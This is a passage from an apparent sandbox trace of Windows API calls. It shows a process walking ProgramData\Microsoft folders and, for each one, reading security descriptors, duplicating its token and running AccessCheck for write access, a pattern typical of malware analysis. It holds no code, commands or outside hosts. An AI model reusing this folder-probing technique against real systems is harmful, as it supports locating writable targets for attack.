lpFileName="c:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0xa0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281afc8) returned 1 [0106.208] GetLastError () returned 0x7a [0106.208] GetCurrentThread () returned 0xfffffffe [0106.208] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.208] GetCurrentProcess () returned 0xffffffff [0106.208] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.208] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.208] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.208] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.208] CloseHandle (hObject=0x340) returned 1 [0106.208] CloseHandle (hObject=0x32c) returned 1 [0106.208] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.208] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.208] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.208] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.208] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.208] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.208] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.208] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.208] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.208] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\IdentityCRL", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.208] GetLastError () returned 0x7a [0106.208] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\IdentityCRL", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.208] GetLastError () returned 0x7a [0106.208] GetCurrentThread () returned 0xfffffffe [0106.209] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.209] GetCurrentProcess () returned 0xffffffff [0106.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.209] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.209] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.209] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.209] CloseHandle (hObject=0x344) returned 1 [0106.209] CloseHandle (hObject=0x33c) returned 1 [0106.209] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.209] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.209] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.209] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.209] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.209] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.209] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.209] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Media Player", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.209] GetLastError () returned 0x7a [0106.209] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Media Player", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xa0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.209] GetLastError () returned 0x7a [0106.209] GetCurrentThread () returned 0xfffffffe [0106.209] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.209] GetCurrentProcess () returned 0xffffffff [0106.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.209] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.209] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.209] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.210] CloseHandle (hObject=0x344) returned 1 [0106.210] CloseHandle (hObject=0x33c) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.210] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.210] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.210] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\MF", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.210] GetLastError () returned 0x7a [0106.210] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\MF", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x8c, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.210] GetLastError () returned 0x7a [0106.210] GetCurrentThread () returned 0xfffffffe [0106.210] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.210] GetCurrentProcess () returned 0xffffffff [0106.210] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.210] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.210] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.210] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.210] CloseHandle (hObject=0x344) returned 1 [0106.210] CloseHandle (hObject=0x33c) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.210] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.210] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.211] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.211] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.211] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\NetFramework", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.211] GetLastError () returned 0x7a [0106.211] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\NetFramework", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x8c, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.211] GetLastError () returned 0x7a [0106.211] GetCurrentThread () returned 0xfffffffe [0106.211] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.211] GetCurrentProcess () returned 0xffffffff [0106.211] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.211] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.211] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.211] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.211] CloseHandle (hObject=0x344) returned 1 [0106.211] CloseHandle (hObject=0x33c) returned 1 [0106.211] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.211] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.211] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0xffffffff [0106.211] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.211] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.211] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.212] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.212] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.212] GetLastError () returned 0x7a [0106.212] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.212] GetLastError () returned 0x7a [0106.212] GetCurrentThread () returned 0xfffffffe [0106.212] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.212] GetCurrentProcess () returned 0xffffffff [0106.212] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.212] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.212] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.212] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.212] CloseHandle (hObject=0x344) returned 1 [0106.212] CloseHandle (hObject=0x33c) returned 1 [0106.212] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.212] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.212] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.212] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network\\Connections", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.212] GetLastError () returned 0x7a [0106.212] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network\\Connections", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x13c, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.212] GetLastError () returned 0x7a [0106.212] GetCurrentThread () returned 0xfffffffe [0106.212] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.213] GetCurrentProcess () returned 0xffffffff [0106.213] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.213] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.213] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.213] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.213] CloseHandle (hObject=0x32c) returned 1 [0106.213] CloseHandle (hObject=0x344) returned 1 [0106.213] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.213] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.213] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.213] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.213] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0xffffffff [0106.213] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.213] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.213] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.213] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Office\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.213] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Office", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.213] GetLastError () returned 0x7a [0106.213] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Office", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x90, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.213] GetLastError () returned 0x7a [0106.213] GetCurrentThread () returned 0xfffffffe [0106.213] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.214] GetCurrentProcess () returned 0xffffffff [0106.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.214] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.214] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.214] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.214] CloseHandle (hObject=0x344) returned 1 [0106.214] CloseHandle (hObject=0x33c) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.214] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.214] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.214] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.214] GetLastError () returned 0x7a [0106.214] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0xb0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.214] GetLastError () returned 0x7a [0106.214] GetCurrentThread () returned 0xfffffffe [0106.214] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.214] GetCurrentProcess () returned 0xffffffff [0106.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.214] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.214] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.214] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.214] CloseHandle (hObject=0x344) returned 1 [0106.214] CloseHandle (hObject=0x33c) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.214] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.215] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.215] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.215] GetLastError () returned 0x7a [0106.215] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", RequestedInformation=0x7, pSecurityDescriptor=0x571688, nLength=0xb0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571688, lpnLengthNeeded=0x281b560) returned 1 [0106.215] GetLastError () returned 0x7a [0106.215] GetCurrentThread () returned 0xfffffffe [0106.215] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.215] GetCurrentProcess () returned 0xffffffff [0106.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.215] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.215] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.215] AccessCheck (in: pSecurityDescriptor=0x571688, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.215] CloseHandle (hObject=0x32c) returned 1 [0106.215] CloseHandle (hObject=0x344) returned 1 [0106.215] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.215] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.215] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.215] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.215] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.215] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.215] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.215] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.215] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.216] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.216] GetLastError () returned 0x7a [0106.216] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281baf8) returned 1 [0106.216] GetLastError () returned 0x7a [0106.216] GetCurrentThread () returned 0xfffffffe [0106.216] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.216] GetCurrentProcess () returned 0xffffffff [0106.216] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.216] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.216] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.216] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.216] CloseHandle (hObject=0x344) returned 1 [0106.216] CloseHandle 